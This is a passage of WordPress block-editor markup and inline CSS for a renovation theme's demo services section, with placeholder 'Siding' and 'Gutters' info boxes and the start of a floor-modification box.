{\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 